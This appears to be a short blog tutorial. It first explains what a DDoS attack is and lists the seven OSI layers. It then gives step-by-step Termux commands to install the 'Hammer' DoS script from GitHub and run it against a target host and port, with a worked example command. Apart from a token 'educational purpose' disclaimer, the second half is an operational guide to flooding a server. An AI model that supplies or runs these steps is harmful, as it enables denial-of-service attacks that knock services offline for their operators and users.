What is DDoS (Distributed Denial of Service) ?
Distributed-Danial-of-Service Or DDoS Attack is a kind of attack method used to attack an online service, server or network by sending more internet traffic to the target. DDoS attacks are successful by using multiple compromised computer systems as sources of attack traffic. Exploited machines can include computers and other networked tools, such as IoT devices. From a high-level point of view, a DDoS attack is like a traffic jam clogging the highway, stopping normal traffic from arriving at its desired destination.
Common Type of DDoS Attack -
Specific DDoS attack vectors target different components of a network link. To understand how different DDoS attacks operate, it is important to know how a network link is made. A network connection on the Internet is made up of several different components or "layers." When building a house from the ground up, each step of the model has a different function. The OSI model shown below is a conceptual construct used to define network communication in 7 different layers.
7 – APPLICATION LAYER : The human-computer interface layer on which applications can access network services
6 – PRESENTATION Layer : Ensures that data is in a usable format and where data encryption occurs
5 – SESSION LAYER : maintains connections and is responsible for controlling ports and sessions;
4 – TRANSPORT LAYER : Transmits data using TCP and UDP transmission protocols.
3 – NETWORK LAYER : Decide which physical direction the data should follow.
2 – DATALINK LAYER : Determines the data structure of the network
1 – PHYSICAL LAYER : Transmits the raw bit stream to the physical medium.
Download Termux App
Hammer Tool GitHub
Steps to Install
pkg install python
pkg install python 2
pkg install git
git clone https://github.com/cyweb/hammer.git
Now Hammer Tool Cloning
Done After Successfully Installed
Open the tool
ls cd hammer ls chmod +x hammer.py ls ./hammer.py
How to run Hammer Dos Script
./hammer.py -s ip or site address -p port number -t turbo
./hammer.py -s example.com -p 80 -t 135
Now Attack started sending n number of request (packet sending hammering)
Use this tutorial only for educational purpose, Do not use it any illegal activities.
Full Tutorial : Youtube Channel - How To KR